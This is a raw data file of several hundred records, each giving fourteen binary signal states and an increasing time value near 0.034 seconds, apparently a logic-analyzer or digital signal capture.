1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642520e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642544e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642596e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642744e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642772e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642820e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642868e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642920e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642944e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642996e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643020e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643044e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643120e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643144e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643196e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643268e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643320e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643344e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643420e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643444e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643468e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643492e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643520e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643544e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643572e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643596e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643620e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643644e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643720e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643744e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643820e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643868e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643920e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643944e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3643972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3643996e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644020e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644044e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644120e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644144e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644196e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644268e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644320e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644344e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3644420e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3644444e-02 1,1,1,1,0,0,0,0,0,1,0,0,0,0,3.3644448e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3644452e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3768524e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,3.3768716e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3768736e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,3.3768764e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3768796e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,3.3769100e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3769124e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3769128e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3769148e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3769172e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3769196e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3769220e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3769244e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3769272e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3769296e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3769324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3769348e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769356e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769372e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769396e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769420e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769444e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769472e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769496e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769572e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3769576e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3769620e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3769648e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769652e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769672e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769696e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769724e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769748e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769772e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769796e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3769844e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3769868e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3769876e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3769892e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3769920e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3769944e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3769972e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3769996e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770020e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770044e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770068e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770120e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770144e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770172e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770196e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770200e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770244e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770320e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770344e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770348e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770372e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770396e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770420e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770444e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770468e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770492e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770500e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770572e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770596e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770620e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770624e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770644e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770668e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770720e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770744e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770772e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770796e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3770820e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3770844e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770852e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770872e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770892e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770920e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770944e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3770972e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3770996e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771020e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771044e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771072e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771092e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771148e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3771172e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771176e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3771220e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771244e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771296e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771320e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771344e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771372e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771396e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771420e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771424e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3771472e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771492e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,3.3771504e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771508e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771544e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3771572e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771576e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3771596e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771620e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3771644e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771668e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3771692e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3771720e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771772e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771796e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771820e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771844e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771892e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771920e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771944e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3771972e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3771996e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772020e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772044e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772068e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772092e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772120e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772144e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772172e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772196e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772220e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772244e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772292e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772320e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772344e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772348e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3772396e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772420e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772444e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772468e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772492e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772520e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772544e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772572e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772620e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772644e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772652e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3772668e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772692e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3772720e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772744e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3772772e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772796e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3772820e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772844e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772852e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772896e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3772920e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3772944e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3772972e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3772996e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773020e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773092e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773120e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773144e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773172e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773196e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,3.3773200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773204e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773220e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773244e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773292e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773320e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773344e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773372e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773396e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773420e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773444e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773520e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773544e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773572e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773596e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773620e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773644e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773692e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3773748e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3773772e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773776e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773796e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773820e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773844e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773868e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773892e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773920e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3773944e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3773972e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3773976e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774020e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774044e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774068e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774092e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774148e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3774172e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3774176e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3774196e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3774220e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3774244e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3774268e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3774292e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3774320e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3774344e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3774372e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774376e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774420e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774444e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774520e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774544e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774572e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774596e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774620e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774644e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774692e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774720e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774744e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774772e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774796e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774820e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774844e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774892e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774920e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774944e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3774972e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3774996e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775020e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775044e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775068e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775092e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775120e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775144e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775172e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775196e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775220e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775244e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775292e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775320e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775344e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775372e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775396e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775420e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775444e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775520e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775544e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775572e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775596e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775620e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775644e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775692e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775720e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775744e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775772e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775796e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775820e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775844e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775892e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775920e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3775944e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3775972e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3775996e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3776000e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3900428e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3900652e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,3.3900672e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3900696e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,3.3901004e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.3901028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3901036e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3901052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3901076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3901100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3901132e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3901156e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3901180e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3901204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,3.3901228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,3.3901252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901260e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901328e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901356e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901380e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901404e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901428e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901476e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3901484e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3901528e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3901556e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901560e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901580e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901604e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901652e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901700e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3901708e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3901756e-02 